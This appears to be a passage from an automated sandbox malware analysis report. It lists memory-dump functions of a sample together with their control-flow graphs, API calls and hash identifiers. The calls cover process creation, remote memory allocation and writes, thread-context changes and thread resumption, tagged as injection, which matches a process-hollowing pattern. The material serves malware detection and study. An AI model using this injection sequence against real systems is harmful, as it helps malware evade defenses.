                                                                        • Not Executed
                                                                        control_flow_graph 744 7321164-7321205 746 7321207-7321211 744->746 747 732123e-732125e 744->747 746->747 748 7321213-7321215 746->748 754 7321260-732126a 747->754 755 7321297-73212c6 747->755 749 7321217-7321221 748->749 750 7321238-732123b 748->750 752 7321223 749->752 753 7321225-7321234 749->753 750->747 752->753 753->753 756 7321236 753->756 754->755 757 732126c-732126e 754->757 761 73212c8-73212d2 755->761 762 73212ff-73213b9 CreateProcessA 755->762 756->750 759 7321270-732127a 757->759 760 7321291-7321294 757->760 763 732127e-732128d 759->763 764 732127c 759->764 760->755 761->762 766 73212d4-73212d6 761->766 775 73213c2-7321448 762->775 776 73213bb-73213c1 762->776 763->763 765 732128f 763->765 764->763 765->760 767 73212d8-73212e2 766->767 768 73212f9-73212fc 766->768 770 73212e6-73212f5 767->770 771 73212e4 767->771 768->762 770->770 773 73212f7 770->773 771->770 773->768 786 732144a-732144e 775->786 787 7321458-732145c 775->787 776->775 786->787 788 7321450 786->788 789 732145e-7321462 787->789 790 732146c-7321470 787->790 788->787 789->790 793 7321464 789->793 791 7321472-7321476 790->791 792 7321480-7321484 790->792 791->792 794 7321478 791->794 795 7321496-732149d 792->795 796 7321486-732148c 792->796 793->790 794->792 797 73214b4 795->797 798 732149f-73214ae 795->798 796->795 800 73214b5 797->800 798->797 800->800
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073213A6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 17161b6ce4a2f0579349d5890516a7e890e5dc72c5198aa7195f99b59a128b24
                                                                        • Instruction ID: ba540bb49e08c646811df5b4c1bd02fba82d841b4e2ecf3ac1a4153b374566c1
                                                                        • Opcode Fuzzy Hash: 17161b6ce4a2f0579349d5890516a7e890e5dc72c5198aa7195f99b59a128b24
                                                                        • Instruction Fuzzy Hash: E6A15EB1D0076ECFEB14DFA8C941BDDBBB2BB48310F148569E808A7240DB759986DF91
                                                                        Function 07321170 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 801 7321170-7321205 803 7321207-7321211 801->803 804 732123e-732125e 801->804 803->804 805 7321213-7321215 803->805 811 7321260-732126a 804->811 812 7321297-73212c6 804->812 806 7321217-7321221 805->806 807 7321238-732123b 805->807 809 7321223 806->809 810 7321225-7321234 806->810 807->804 809->810 810->810 813 7321236 810->813 811->812 814 732126c-732126e 811->814 818 73212c8-73212d2 812->818 819 73212ff-73213b9 CreateProcessA 812->819 813->807 816 7321270-732127a 814->816 817 7321291-7321294 814->817 820 732127e-732128d 816->820 821 732127c 816->821 817->812 818->819 823 73212d4-73212d6 818->823 832 73213c2-7321448 819->832 833 73213bb-73213c1 819->833 820->820 822 732128f 820->822 821->820 822->817 824 73212d8-73212e2 823->824 825 73212f9-73212fc 823->825 827 73212e6-73212f5 824->827 828 73212e4 824->828 825->819 827->827 830 73212f7 827->830 828->827 830->825 843 732144a-732144e 832->843 844 7321458-732145c 832->844 833->832 843->844 845 7321450 843->845 846 732145e-7321462 844->846 847 732146c-7321470 844->847 845->844 846->847 850 7321464 846->850 848 7321472-7321476 847->848 849 7321480-7321484 847->849 848->849 851 7321478 848->851 852 7321496-732149d 849->852 853 7321486-732148c 849->853 850->847 851->849 854 73214b4 852->854 855 732149f-73214ae 852->855 853->852 857 73214b5 854->857 855->854 857->857
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073213A6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: e8aa077d89de18b88b5ab7959629fece2faa3b59fd6afed2fc87c0fdd5fc465e
                                                                        • Instruction ID: 57a1c6d8699952f6b6dc54b50ad91b0cd8335e626aa873b7085fa88096980fe6
                                                                        • Opcode Fuzzy Hash: e8aa077d89de18b88b5ab7959629fece2faa3b59fd6afed2fc87c0fdd5fc465e
                                                                        • Instruction Fuzzy Hash: D7915DB1D0036ECFEB14DFA8C941BDDBBB2BB48310F148569E808A7240DB759986DF91
                                                                        Function 014CAD68 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 858 14cad68-14cad77 859 14cad79-14cad86 call 14ca08c 858->859 860 14cada3-14cada7 858->860 867 14cad9c 859->867 868 14cad88 859->868 861 14cada9-14cadb3 860->861 862 14cadbb-14cadfc 860->862 861->862 869 14cadfe-14cae06 862->869 870 14cae09-14cae17 862->870 867->860 913 14cad8e call 14caff0 868->913 914 14cad8e call 14cb000 868->914 869->870 871 14cae19-14cae1e 870->871 872 14cae3b-14cae3d 870->872 875 14cae29 871->875 876 14cae20-14cae27 call 14ca098 871->876 874 14cae40-14cae47 872->874 873 14cad94-14cad96 873->867 877 14caed8-14caf98 873->877 878 14cae49-14cae51 874->878 879 14cae54-14cae5b 874->879 881 14cae2b-14cae39 875->881 876->881 908 14caf9a-14caf9d 877->908 909 14cafa0-14cafcb GetModuleHandleW 877->909 878->879 882 14cae5d-14cae65 879->882 883 14cae68-14cae71 call 14ca0a8 879->883 881->874 882->883 889 14cae7e-14cae83 883->889 890 14cae73-14cae7b 883->890 891 14cae85-14cae8c 889->891 892 14caea1-14caea5 889->892 890->889 891->892 894 14cae8e-14cae9e call 14ca0b8 call 14ca0c8 891->894 895 14caeab-14caeae 892->895 894->892 898 14caeb0-14caece 895->898 899 14caed1-14caed7 895->899 898->899 908->909 910 14cafcd-14cafd3 909->910 911 14cafd4-14cafe8 909->911 910->911 913->873 914->873
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014CAFBE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: bd6f234347741e65629e30b1ce64767be471777318222dbef2515331cbe4cfb0
                                                                        • Instruction ID: 4e1ad9bc459e8504ad052b1c05b171814f80d40036ca0ed4c6a7c5c3d1523003
                                                                        • Opcode Fuzzy Hash: bd6f234347741e65629e30b1ce64767be471777318222dbef2515331cbe4cfb0
                                                                        • Instruction Fuzzy Hash: 707125B4A00B498FD764DF6AD04475ABBF1BF88714F208A2ED44AD7B50E734E849CB91
                                                                        Function 014C44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 915 14c44b4-14c59d9 CreateActCtxA 918 14c59db-14c59e1 915->918 919 14c59e2-14c5a3c 915->919 918->919 926 14c5a3e-14c5a41 919->926 927 14c5a4b-14c5a4f 919->927 926->927 928 14c5a60 927->928 929 14c5a51-14c5a5d 927->929 931 14c5a61 928->931 929->928 931->931
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 014C59C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 6316725d44600eec481d77d66a3b31ee3fc6dffdd41c993e0bdbfa142baed7f4
                                                                        • Instruction ID: 040f4c299c14aa773b2964c1b2e5fe6570f212308229bdf8c250c0e57a959c76
                                                                        • Opcode Fuzzy Hash: 6316725d44600eec481d77d66a3b31ee3fc6dffdd41c993e0bdbfa142baed7f4
                                                                        • Instruction Fuzzy Hash: CD41D0B4D00719CBDB24DFAAC884ADEBBF5BF49704F20806AD409AB251DB756946CF90
                                                                        Function 014C590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 932 14c590c-14c59d9 CreateActCtxA 934 14c59db-14c59e1 932->934 935 14c59e2-14c5a3c 932->935 934->935 942 14c5a3e-14c5a41 935->942 943 14c5a4b-14c5a4f 935->943 942->943 944 14c5a60 943->944 945 14c5a51-14c5a5d 943->945 947 14c5a61 944->947 945->944 947->947
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 014C59C9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: a2e3dfcdb4f4f4560046838fd80c0543e412644ab341098ec906f94ee55c8084
                                                                        • Instruction ID: a1a1c27b38b44b56f54538a31b4079324a9cc6dd2d4756a85bf0a504e47cfdb3
                                                                        • Opcode Fuzzy Hash: a2e3dfcdb4f4f4560046838fd80c0543e412644ab341098ec906f94ee55c8084
                                                                        • Instruction Fuzzy Hash: E34112B0D00719CBDB24CFAAC884BCEBBF1BF49304F2480AAD008AB251DB756946CF50
                                                                        Function 07320EE0 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 948 7320ee0-7320f36 951 7320f46-7320f85 WriteProcessMemory 948->951 952 7320f38-7320f44 948->952 954 7320f87-7320f8d 951->954 955 7320f8e-7320fbe 951->955 952->951 954->955
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07320F78
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 88d1f1f0f5f68992c31d2394edc94ce7bc51f2bc91644ea7877a6051a24f7f7e
                                                                        • Instruction ID: 406e6dbc30387b7ef34458a69277c24c8207a9e93903d0d19e141dc2f1b2f374
                                                                        • Opcode Fuzzy Hash: 88d1f1f0f5f68992c31d2394edc94ce7bc51f2bc91644ea7877a6051a24f7f7e
                                                                        • Instruction Fuzzy Hash: DD2148B19003599FDB10CFA9C885BDEBFF5FF48320F108429E918A7241D7789945DBA1
                                                                        Function 07320EE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 959 7320ee8-7320f36 961 7320f46-7320f85 WriteProcessMemory 959->961 962 7320f38-7320f44 959->962 964 7320f87-7320f8d 961->964 965 7320f8e-7320fbe 961->965 962->961 964->965
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07320F78
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: a7b38ae391e5a2e8fdfdb3e941ce06b372886b7cfd4ce46db5c57da6888bd3c4
                                                                        • Instruction ID: bea65dfaf9c8f044445e856328fdcc5ac26eed4a81781f5b0a2564f3bc074d6e
                                                                        • Opcode Fuzzy Hash: a7b38ae391e5a2e8fdfdb3e941ce06b372886b7cfd4ce46db5c57da6888bd3c4
                                                                        • Instruction Fuzzy Hash: D22139B19003599FDB10DFA9C881BDEBBF5FF48320F108429E918A7250D7789945DBA1
                                                                        Function 07320FD0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 980 7320fd0-7321065 ReadProcessMemory 983 7321067-732106d 980->983 984 732106e-732109e 980->984 983->984
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07321058
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 5c584fea39b54f4dfdadb200cefa1638b6ae56f509fbda4aabfc146b16c85040
                                                                        • Instruction ID: 1ccbf2e0b58e06866587947f0ede9a962b5cdb3763d5cb33ca69884943f7efd9
                                                                        • Opcode Fuzzy Hash: 5c584fea39b54f4dfdadb200cefa1638b6ae56f509fbda4aabfc146b16c85040
                                                                        • Instruction Fuzzy Hash: 45214AB19003599FDB10DFAAC841ADEFBF5FF48320F50882AE559A7240C7759941DBA1
                                                                        Function 07320D49 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 969 7320d49-7320d9b 972 7320dab-7320ddb Wow64SetThreadContext 969->972 973 7320d9d-7320da9 969->973 975 7320de4-7320e14 972->975 976 7320ddd-7320de3 972->976 973->972 976->975
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07320DCE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: c2846336d51b14698eee79040cb2ba57f68f8331fe8df1ca2e674e088577ea6a
                                                                        • Instruction ID: a189f55d6c55c209f9168040455a763cadffc5735759be3ba4e310443666eb00
                                                                        • Opcode Fuzzy Hash: c2846336d51b14698eee79040cb2ba57f68f8331fe8df1ca2e674e088577ea6a
                                                                        • Instruction Fuzzy Hash: 5E215CB19002198FDB10DFAAC4457EEBFF4EF48324F14842AD419A7241C778A945CBA1
                                                                        Function 014CD23C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 988 14cd23c-14cd6e4 DuplicateHandle 990 14cd6ed-14cd70a 988->990 991 14cd6e6-14cd6ec 988->991 991->990
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014CD616,?,?,?,?,?), ref: 014CD6D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 1a803286b863a6e34a1469056173a4c3e5c17c2e8841b01393380dbd351fd1fa
                                                                        • Instruction ID: b2d575ffd52edceadf54b2d8ca13aefe39a074d8c06f4673ab61a7259a842e50
                                                                        • Opcode Fuzzy Hash: 1a803286b863a6e34a1469056173a4c3e5c17c2e8841b01393380dbd351fd1fa
                                                                        • Instruction Fuzzy Hash: A521D4B5D002489FDB10CF9AD484ADEBBF4EB48320F14842AE919A7350D374A940CFA5
                                                                        Function 014CD648 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014CD616,?,?,?,?,?), ref: 014CD6D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 3e158250652741fad6c3475dd806a55bd6ed6c221a18aac2dacabc91cc7cc207
                                                                        • Instruction ID: ff2e5fe24b0ae79d612e113dede00844602eebeeef90a65a3c6471df83090c35
                                                                        • Opcode Fuzzy Hash: 3e158250652741fad6c3475dd806a55bd6ed6c221a18aac2dacabc91cc7cc207
                                                                        • Instruction Fuzzy Hash: 0621E3B5D00249DFDB10CF9AD584ADEBBF4FB48320F24841AE919A7710C378A940CF60
                                                                        Function 07320FD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07321058
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: b8868b751935f313b0ddb88963df70d29b43726f56efbe0699ef7916b802115b
                                                                        • Instruction ID: c63630062a512f34b9fd89f45910c5913470eaf1550510efef2c3a9ade5a1d16
                                                                        • Opcode Fuzzy Hash: b8868b751935f313b0ddb88963df70d29b43726f56efbe0699ef7916b802115b
                                                                        • Instruction Fuzzy Hash: ED2128B19002599FDB10DFAAC940AEEFBF5FF48320F508429E518A7240C7799901DBA1
                                                                        Function 07320D50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07320DCE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: cf5f0a75b9b97bfe92a670d65171d9dc2292d3d306943254e1b60189c75f6e60
                                                                        • Instruction ID: 0a9f3f273cf76b726fcad19045d05919495caf49da441e26fb71c414e594dee9
                                                                        • Opcode Fuzzy Hash: cf5f0a75b9b97bfe92a670d65171d9dc2292d3d306943254e1b60189c75f6e60
                                                                        • Instruction Fuzzy Hash: ED214CB1D002198FDB14DFAAC4857EEBBF4EF98324F148429D419A7240C778A945CFA0
                                                                        Function 07320E21 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07320E96
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: a0a519da45d93b599d73e2af31ff57862c5e1606065608aa3fb6d71c0472dabd
                                                                        • Instruction ID: 834009810b285e94ac4f60fb620b4fd9898f4e5ecb0be648c73815794402e7dd
                                                                        • Opcode Fuzzy Hash: a0a519da45d93b599d73e2af31ff57862c5e1606065608aa3fb6d71c0472dabd
                                                                        • Instruction Fuzzy Hash: 171189728002489FDB10DFAAC800ADEFFF5EF48320F108819E419A7650C7759944DFA0
                                                                        Function 07374FDF Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: a8c658ddcec7eb957efaebdda07e99f27f29a0dde44d5408c9dbc41dea6381de
                                                                        • Instruction ID: 3b356893f09c6719e918f7b77ef31a1b6a7df44db7c00860e417d27fddcca15a
                                                                        • Opcode Fuzzy Hash: a8c658ddcec7eb957efaebdda07e99f27f29a0dde44d5408c9dbc41dea6381de
                                                                        • Instruction Fuzzy Hash: 66E191B4E002198FDB64DFA9C880A9DBBF1FB49310F1481AAD81DE7345E735AA81CF50
                                                                        Function 07320E28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07320E96
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: af9c7aa4263874142f320108750f55252f7ebfa86b818f9bfbda0b56b84628cf
                                                                        • Instruction ID: dc3901f6a9d9ad182eb853d78e49fc4f93c361ece4a5a598ce8000b2f100dd46
                                                                        • Opcode Fuzzy Hash: af9c7aa4263874142f320108750f55252f7ebfa86b818f9bfbda0b56b84628cf
                                                                        • Instruction Fuzzy Hash: BD11677180024D9FDB10DFAAC844ADFBFF5EF88320F148819E519A7250C7759940CFA0
                                                                        Function 07320C99 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 9a036a9707746bb6bc85ee0857c66645fe101c40c9a25b0e598aa9be411edcb2
                                                                        • Instruction ID: d68967076f40055a4bbab9f8b6877e679e4f50b972614005d4015745b5fdf7b4
                                                                        • Opcode Fuzzy Hash: 9a036a9707746bb6bc85ee0857c66645fe101c40c9a25b0e598aa9be411edcb2
                                                                        • Instruction Fuzzy Hash: 66116DB1D002598FDB14DFAAD444BEEFFF4EF98324F148819D019A7640C735A905CB90
                                                                        Function 07320CA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 770358c638d883ae42e0a749059b57cd3013541e8c3fa3f2e7534c3654e3eccf
                                                                        • Instruction ID: f0dbefd80da66d6438009c41e1b107aa21989f55c551fbc1ee54d77c1474693b
                                                                        • Opcode Fuzzy Hash: 770358c638d883ae42e0a749059b57cd3013541e8c3fa3f2e7534c3654e3eccf
                                                                        • Instruction Fuzzy Hash: 19118CB1D002498FDB10DFAAC444BDEFBF8EF88324F248819D419A7640CB75A904CFA0
                                                                        Function 014CAF58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014CAFBE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1849824069.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_14c0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: a029eb19476163f6a55f32928359e35ad67cbad61281afc1d7ac9b6dec58b255
                                                                        • Instruction ID: 50ebae6ef79be7e40fd46402a6ea1207ef7255fd17c6315114fc959c5eafa02d
                                                                        • Opcode Fuzzy Hash: a029eb19476163f6a55f32928359e35ad67cbad61281afc1d7ac9b6dec58b255
                                                                        • Instruction Fuzzy Hash: 591110B5C006498FDB20CF9AD444ADEFBF4EF88324F24842AD418A7650D379A545CFA1
                                                                        Function 07324738 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0732479D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: d83c59789ad97f268b1b080ea1b7b0caed022fafad935a99522c88878e65dac8
                                                                        • Instruction ID: 0a68f784cfc95c63ddaf81a47b12f48c978b97e4f5741fb0933c550139ccaf03
                                                                        • Opcode Fuzzy Hash: d83c59789ad97f268b1b080ea1b7b0caed022fafad935a99522c88878e65dac8
                                                                        • Instruction Fuzzy Hash: D71103B5800259DFDB10DF9AD485BDEFBF8FB48320F20881AD529A7600C375A944CFA1
                                                                        Function 07324740 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0732479D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853796096.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7320000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 80ceed189a5512651c79d29c5943590b39df4517f7ee0333fd06e78c02e94486
                                                                        • Instruction ID: edb6aa83494420252a811d021a18913f467daad5bb354397bea3b20d66d80814
                                                                        • Opcode Fuzzy Hash: 80ceed189a5512651c79d29c5943590b39df4517f7ee0333fd06e78c02e94486
                                                                        • Instruction Fuzzy Hash: 921103B5800259DFDB10DF9AD884BDEFBF8EB48320F108819D528A7600C375A944CFA1
                                                                        Function 07373D9E Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
